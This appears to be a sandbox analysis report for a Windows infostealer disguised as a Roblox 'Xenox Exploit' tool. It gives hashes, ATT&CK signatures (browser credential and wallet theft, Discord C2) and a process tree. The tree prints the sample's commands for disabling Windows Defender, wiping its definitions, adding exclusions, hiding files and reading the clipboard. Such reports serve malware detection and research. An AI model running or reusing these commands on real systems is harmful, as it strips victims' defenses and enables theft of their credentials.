2fa3f17ecf4e81b96837aff155173a34c81f14e16d543237649eaa0885c01f27

Analysis

max time kernel
434s
max time network
439s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
23/12/2024, 16:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Xenox Exploit.exe
Size

7.5MB
MD5

809744fdb0a46e19d8fdb5db88b95a31
SHA1

bc8d73f5aced88732c4d669e87026c7806bce2ca
SHA256

2fa3f17ecf4e81b96837aff155173a34c81f14e16d543237649eaa0885c01f27
SHA512

4a665b44b84cbf2b284d1670d1c54a04bbd7244fce715e4b54b350e9077a5dd974d455775bddfc2e3fbc9e930ba3755c0610e42f4f913d2642a0b324b74b7264
SSDEEP

196608:udQCwV+IurErvI9pWjgN3ZdahF0pbH1AY7WtQsNo/03vC1C:pVRurEUWjqeWx06rYYC

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
1464	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2288	powershell.exe
5216	powershell.exe
5908	powershell.exe
5772	powershell.exe
2728	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Xenox Exploit.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3700	cmd.exe
3408	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2700	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
5324	Xenox Exploit.exe
5324	Xenox Exploit.exe
5324	Xenox Exploit.exe
5324	Xenox Exploit.exe
5324	Xenox Exploit.exe
5324	Xenox Exploit.exe
5324	Xenox Exploit.exe
5324	Xenox Exploit.exe
5324	Xenox Exploit.exe
5324	Xenox Exploit.exe
5324	Xenox Exploit.exe
5324	Xenox Exploit.exe
5324	Xenox Exploit.exe
5324	Xenox Exploit.exe
5324	Xenox Exploit.exe
5324	Xenox Exploit.exe
5324	Xenox Exploit.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
56	discord.com
65	discord.com
99	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com
23	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
4512	tasklist.exe
4232	tasklist.exe
6132	tasklist.exe
1264	tasklist.exe
224	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3088	cmd.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0028000000046169-21.dat	upx
behavioral1/memory/5324-25-0x00007FFBE55E0000-0x00007FFBE5CA4000-memory.dmp	upx
behavioral1/files/0x002800000004615c-27.dat	upx
behavioral1/files/0x002800000004615d-41.dat	upx
behavioral1/files/0x0028000000046163-47.dat	upx
behavioral1/memory/5324-48-0x00007FFBFF250000-0x00007FFBFF25F000-memory.dmp	upx
behavioral1/files/0x0028000000046162-46.dat	upx
behavioral1/files/0x0028000000046161-45.dat	upx
behavioral1/files/0x0028000000046160-44.dat	upx
behavioral1/files/0x002800000004615f-43.dat	upx
behavioral1/files/0x002800000004615e-42.dat	upx
behavioral1/files/0x002800000004615b-40.dat	upx
behavioral1/files/0x007600000004616e-39.dat	upx
behavioral1/files/0x004f00000004616d-38.dat	upx
behavioral1/files/0x002800000004616c-37.dat	upx
behavioral1/files/0x0028000000046168-34.dat	upx
behavioral1/files/0x0028000000046166-33.dat	upx
behavioral1/files/0x0028000000046167-31.dat	upx
behavioral1/memory/5324-30-0x00007FFBF6800000-0x00007FFBF6825000-memory.dmp	upx
behavioral1/memory/5324-54-0x00007FFBF6390000-0x00007FFBF63BD000-memory.dmp	upx
behavioral1/memory/5324-56-0x00007FFBFA9E0000-0x00007FFBFA9FA000-memory.dmp	upx
behavioral1/memory/5324-58-0x00007FFBF5800000-0x00007FFBF5824000-memory.dmp	upx
behavioral1/memory/5324-60-0x00007FFBE5460000-0x00007FFBE55DF000-memory.dmp	upx
behavioral1/memory/5324-64-0x00007FFBFA980000-0x00007FFBFA98D000-memory.dmp	upx
behavioral1/memory/5324-66-0x00007FFBF5670000-0x00007FFBF56A3000-memory.dmp	upx
behavioral1/memory/5324-71-0x00007FFBE5250000-0x00007FFBE531D000-memory.dmp	upx
behavioral1/memory/5324-70-0x00007FFBE55E0000-0x00007FFBE5CA4000-memory.dmp	upx
behavioral1/memory/5324-74-0x00007FFBF6800000-0x00007FFBF6825000-memory.dmp	upx
behavioral1/memory/5324-73-0x00007FFBE4D20000-0x00007FFBE5249000-memory.dmp	upx
behavioral1/memory/5324-62-0x00007FFBF56B0000-0x00007FFBF56C9000-memory.dmp	upx
behavioral1/memory/5324-76-0x00007FFBF5070000-0x00007FFBF5084000-memory.dmp	upx
behavioral1/memory/5324-79-0x00007FFBF58C0000-0x00007FFBF58CD000-memory.dmp	upx
behavioral1/memory/5324-81-0x00007FFBFA9E0000-0x00007FFBFA9FA000-memory.dmp	upx
behavioral1/memory/5324-78-0x00007FFBF6390000-0x00007FFBF63BD000-memory.dmp	upx
behavioral1/memory/5324-82-0x00007FFBE49E0000-0x00007FFBE4AFB000-memory.dmp	upx
behavioral1/memory/5324-103-0x00007FFBF5800000-0x00007FFBF5824000-memory.dmp	upx
behavioral1/memory/5324-123-0x00007FFBE5460000-0x00007FFBE55DF000-memory.dmp	upx
behavioral1/memory/5324-231-0x00007FFBF5670000-0x00007FFBF56A3000-memory.dmp	upx
behavioral1/memory/5324-279-0x00007FFBE5250000-0x00007FFBE531D000-memory.dmp	upx
behavioral1/memory/5324-283-0x00007FFBE4D20000-0x00007FFBE5249000-memory.dmp	upx
behavioral1/memory/5324-305-0x00007FFBE5460000-0x00007FFBE55DF000-memory.dmp	upx
behavioral1/memory/5324-299-0x00007FFBE55E0000-0x00007FFBE5CA4000-memory.dmp	upx
behavioral1/memory/5324-300-0x00007FFBF6800000-0x00007FFBF6825000-memory.dmp	upx
behavioral1/memory/5324-677-0x00007FFBE55E0000-0x00007FFBE5CA4000-memory.dmp	upx
behavioral1/memory/5324-951-0x00007FFBF5800000-0x00007FFBF5824000-memory.dmp	upx
behavioral1/memory/5324-950-0x00007FFBFA9E0000-0x00007FFBFA9FA000-memory.dmp	upx
behavioral1/memory/5324-956-0x00007FFBE5250000-0x00007FFBE531D000-memory.dmp	upx
behavioral1/memory/5324-955-0x00007FFBF5670000-0x00007FFBF56A3000-memory.dmp	upx
behavioral1/memory/5324-954-0x00007FFBFA980000-0x00007FFBFA98D000-memory.dmp	upx
behavioral1/memory/5324-953-0x00007FFBF56B0000-0x00007FFBF56C9000-memory.dmp	upx
behavioral1/memory/5324-952-0x00007FFBE5460000-0x00007FFBE55DF000-memory.dmp	upx
behavioral1/memory/5324-949-0x00007FFBF6390000-0x00007FFBF63BD000-memory.dmp	upx
behavioral1/memory/5324-948-0x00007FFBFF250000-0x00007FFBFF25F000-memory.dmp	upx
behavioral1/memory/5324-947-0x00007FFBF6800000-0x00007FFBF6825000-memory.dmp	upx
behavioral1/memory/5324-946-0x00007FFBE4D20000-0x00007FFBE5249000-memory.dmp	upx
behavioral1/memory/5324-960-0x00007FFBE49E0000-0x00007FFBE4AFB000-memory.dmp	upx
behavioral1/memory/5324-958-0x00007FFBF5070000-0x00007FFBF5084000-memory.dmp	upx
behavioral1/memory/5324-959-0x00007FFBF58C0000-0x00007FFBF58CD000-memory.dmp	upx
behavioral1/memory/5324-957-0x00007FFBE55E0000-0x00007FFBE5CA4000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5220	cmd.exe
3920	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2032	cmd.exe
5528	netsh.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
6008	WMIC.exe
3328	WMIC.exe
5896	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5308	systeminfo.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1798060429-1844192857-3165087720-1000_Classes\Local Settings	firefox.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3920	PING.EXE

Suspicious behavior: EnumeratesProcesses 54 IoCs

pid	Process
5504	WMIC.exe
5504	WMIC.exe
5504	WMIC.exe
5504	WMIC.exe
5772	powershell.exe
2288	powershell.exe
5772	powershell.exe
2288	powershell.exe
5772	powershell.exe
2288	powershell.exe
6008	WMIC.exe
6008	WMIC.exe
6008	WMIC.exe
6008	WMIC.exe
3328	WMIC.exe
3328	WMIC.exe
3328	WMIC.exe
3328	WMIC.exe
2728	powershell.exe
2728	powershell.exe
3408	powershell.exe
3408	powershell.exe
3408	powershell.exe
5968	WMIC.exe
5968	WMIC.exe
5968	WMIC.exe
5968	WMIC.exe
5368	powershell.exe
5368	powershell.exe
5368	powershell.exe
5216	powershell.exe
5216	powershell.exe
3016	powershell.exe
3016	powershell.exe
3536	WMIC.exe
3536	WMIC.exe
3536	WMIC.exe
3536	WMIC.exe
4484	WMIC.exe
4484	WMIC.exe
4484	WMIC.exe
4484	WMIC.exe
5848	WMIC.exe
5848	WMIC.exe
5848	WMIC.exe
5848	WMIC.exe
5908	powershell.exe
5908	powershell.exe
5896	WMIC.exe
5896	WMIC.exe
5896	WMIC.exe
5896	WMIC.exe
5616	powershell.exe
5616	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	5504	WMIC.exe
Token: SeSecurityPrivilege	5504	WMIC.exe
Token: SeTakeOwnershipPrivilege	5504	WMIC.exe
Token: SeLoadDriverPrivilege	5504	WMIC.exe
Token: SeSystemProfilePrivilege	5504	WMIC.exe
Token: SeSystemtimePrivilege	5504	WMIC.exe
Token: SeProfSingleProcessPrivilege	5504	WMIC.exe
Token: SeIncBasePriorityPrivilege	5504	WMIC.exe
Token: SeCreatePagefilePrivilege	5504	WMIC.exe
Token: SeBackupPrivilege	5504	WMIC.exe
Token: SeRestorePrivilege	5504	WMIC.exe
Token: SeShutdownPrivilege	5504	WMIC.exe
Token: SeDebugPrivilege	5504	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5504	WMIC.exe
Token: SeRemoteShutdownPrivilege	5504	WMIC.exe
Token: SeUndockPrivilege	5504	WMIC.exe
Token: SeManageVolumePrivilege	5504	WMIC.exe
Token: 33	5504	WMIC.exe
Token: 34	5504	WMIC.exe
Token: 35	5504	WMIC.exe
Token: 36	5504	WMIC.exe
Token: SeDebugPrivilege	4512	tasklist.exe
Token: SeDebugPrivilege	5772	powershell.exe
Token: SeDebugPrivilege	2288	powershell.exe
Token: SeIncreaseQuotaPrivilege	5504	WMIC.exe
Token: SeSecurityPrivilege	5504	WMIC.exe
Token: SeTakeOwnershipPrivilege	5504	WMIC.exe
Token: SeLoadDriverPrivilege	5504	WMIC.exe
Token: SeSystemProfilePrivilege	5504	WMIC.exe
Token: SeSystemtimePrivilege	5504	WMIC.exe
Token: SeProfSingleProcessPrivilege	5504	WMIC.exe
Token: SeIncBasePriorityPrivilege	5504	WMIC.exe
Token: SeCreatePagefilePrivilege	5504	WMIC.exe
Token: SeBackupPrivilege	5504	WMIC.exe
Token: SeRestorePrivilege	5504	WMIC.exe
Token: SeShutdownPrivilege	5504	WMIC.exe
Token: SeDebugPrivilege	5504	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5504	WMIC.exe
Token: SeRemoteShutdownPrivilege	5504	WMIC.exe
Token: SeUndockPrivilege	5504	WMIC.exe
Token: SeManageVolumePrivilege	5504	WMIC.exe
Token: 33	5504	WMIC.exe
Token: 34	5504	WMIC.exe
Token: 35	5504	WMIC.exe
Token: 36	5504	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5772	powershell.exe
Token: SeSecurityPrivilege	5772	powershell.exe
Token: SeTakeOwnershipPrivilege	5772	powershell.exe
Token: SeLoadDriverPrivilege	5772	powershell.exe
Token: SeSystemProfilePrivilege	5772	powershell.exe
Token: SeSystemtimePrivilege	5772	powershell.exe
Token: SeProfSingleProcessPrivilege	5772	powershell.exe
Token: SeIncBasePriorityPrivilege	5772	powershell.exe
Token: SeCreatePagefilePrivilege	5772	powershell.exe
Token: SeBackupPrivilege	5772	powershell.exe
Token: SeRestorePrivilege	5772	powershell.exe
Token: SeShutdownPrivilege	5772	powershell.exe
Token: SeDebugPrivilege	5772	powershell.exe
Token: SeSystemEnvironmentPrivilege	5772	powershell.exe
Token: SeRemoteShutdownPrivilege	5772	powershell.exe
Token: SeUndockPrivilege	5772	powershell.exe
Token: SeManageVolumePrivilege	5772	powershell.exe
Token: 33	5772	powershell.exe
Token: 34	5772	powershell.exe

Suspicious use of FindShellTrayWindow 21 IoCs

pid	Process
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe

Suspicious use of SendNotifyMessage 20 IoCs

pid	Process
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe
6088	firefox.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
6088	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5556 wrote to memory of 5324	5556	Xenox Exploit.exe	84
PID 5556 wrote to memory of 5324	5556	Xenox Exploit.exe	84
PID 5324 wrote to memory of 5612	5324	Xenox Exploit.exe	86
PID 5324 wrote to memory of 5612	5324	Xenox Exploit.exe	86
PID 5324 wrote to memory of 5104	5324	Xenox Exploit.exe	87
PID 5324 wrote to memory of 5104	5324	Xenox Exploit.exe	87
PID 5324 wrote to memory of 4728	5324	Xenox Exploit.exe	88
PID 5324 wrote to memory of 4728	5324	Xenox Exploit.exe	88
PID 5324 wrote to memory of 4928	5324	Xenox Exploit.exe	91
PID 5324 wrote to memory of 4928	5324	Xenox Exploit.exe	91
PID 5324 wrote to memory of 5116	5324	Xenox Exploit.exe	94
PID 5324 wrote to memory of 5116	5324	Xenox Exploit.exe	94
PID 5612 wrote to memory of 5772	5612	cmd.exe	96
PID 5612 wrote to memory of 5772	5612	cmd.exe	96
PID 4928 wrote to memory of 4512	4928	cmd.exe	97
PID 4928 wrote to memory of 4512	4928	cmd.exe	97
PID 5104 wrote to memory of 2288	5104	cmd.exe	98
PID 5104 wrote to memory of 2288	5104	cmd.exe	98
PID 5116 wrote to memory of 5504	5116	cmd.exe	99
PID 5116 wrote to memory of 5504	5116	cmd.exe	99
PID 4728 wrote to memory of 5608	4728	cmd.exe	100
PID 4728 wrote to memory of 5608	4728	cmd.exe	100
PID 5324 wrote to memory of 2436	5324	Xenox Exploit.exe	103
PID 5324 wrote to memory of 2436	5324	Xenox Exploit.exe	103
PID 5104 wrote to memory of 1464	5104	cmd.exe	105
PID 5104 wrote to memory of 1464	5104	cmd.exe	105
PID 2436 wrote to memory of 1472	2436	cmd.exe	106
PID 2436 wrote to memory of 1472	2436	cmd.exe	106
PID 5324 wrote to memory of 2164	5324	Xenox Exploit.exe	107
PID 5324 wrote to memory of 2164	5324	Xenox Exploit.exe	107
PID 2164 wrote to memory of 4724	2164	cmd.exe	109
PID 2164 wrote to memory of 4724	2164	cmd.exe	109
PID 5324 wrote to memory of 3572	5324	Xenox Exploit.exe	110
PID 5324 wrote to memory of 3572	5324	Xenox Exploit.exe	110
PID 3572 wrote to memory of 6008	3572	cmd.exe	112
PID 3572 wrote to memory of 6008	3572	cmd.exe	112
PID 5324 wrote to memory of 220	5324	Xenox Exploit.exe	113
PID 5324 wrote to memory of 220	5324	Xenox Exploit.exe	113
PID 220 wrote to memory of 3328	220	cmd.exe	115
PID 220 wrote to memory of 3328	220	cmd.exe	115
PID 5324 wrote to memory of 3088	5324	Xenox Exploit.exe	116
PID 5324 wrote to memory of 3088	5324	Xenox Exploit.exe	116
PID 5324 wrote to memory of 6072	5324	Xenox Exploit.exe	117
PID 5324 wrote to memory of 6072	5324	Xenox Exploit.exe	117
PID 3088 wrote to memory of 1972	3088	cmd.exe	120
PID 3088 wrote to memory of 1972	3088	cmd.exe	120
PID 6072 wrote to memory of 2728	6072	cmd.exe	121
PID 6072 wrote to memory of 2728	6072	cmd.exe	121
PID 5324 wrote to memory of 1208	5324	Xenox Exploit.exe	125
PID 5324 wrote to memory of 1208	5324	Xenox Exploit.exe	125
PID 5324 wrote to memory of 1860	5324	Xenox Exploit.exe	126
PID 5324 wrote to memory of 1860	5324	Xenox Exploit.exe	126
PID 1208 wrote to memory of 4232	1208	cmd.exe	129
PID 1208 wrote to memory of 4232	1208	cmd.exe	129
PID 1860 wrote to memory of 6132	1860	cmd.exe	130
PID 1860 wrote to memory of 6132	1860	cmd.exe	130
PID 5324 wrote to memory of 2176	5324	Xenox Exploit.exe	131
PID 5324 wrote to memory of 2176	5324	Xenox Exploit.exe	131
PID 5324 wrote to memory of 3700	5324	Xenox Exploit.exe	132
PID 5324 wrote to memory of 3700	5324	Xenox Exploit.exe	132
PID 5324 wrote to memory of 2756	5324	Xenox Exploit.exe	135
PID 5324 wrote to memory of 2756	5324	Xenox Exploit.exe	135
PID 5324 wrote to memory of 4004	5324	Xenox Exploit.exe	137
PID 5324 wrote to memory of 4004	5324	Xenox Exploit.exe	137

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1972	attrib.exe
4052	attrib.exe
1236	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe
"C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5556
- C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe
  "C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:5324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5612
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5104
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2288
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:1464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Debes tener bloxtrap para poder usar este exploit', 0, 'Information', 48+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4728
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Debes tener bloxtrap para poder usar este exploit', 0, 'Information', 48+16);close()"
      4⤵
      PID:5608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4928
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5116
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2436
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:1472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2164
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3572
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:6008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:220
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:3328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:3088
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe"
      4⤵
      Views/modifies file attributes
      PID:1972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:6072
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1208
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1860
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:6132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:2176
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3700
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:3408
- - C:\Windows\system32\cmd.exe
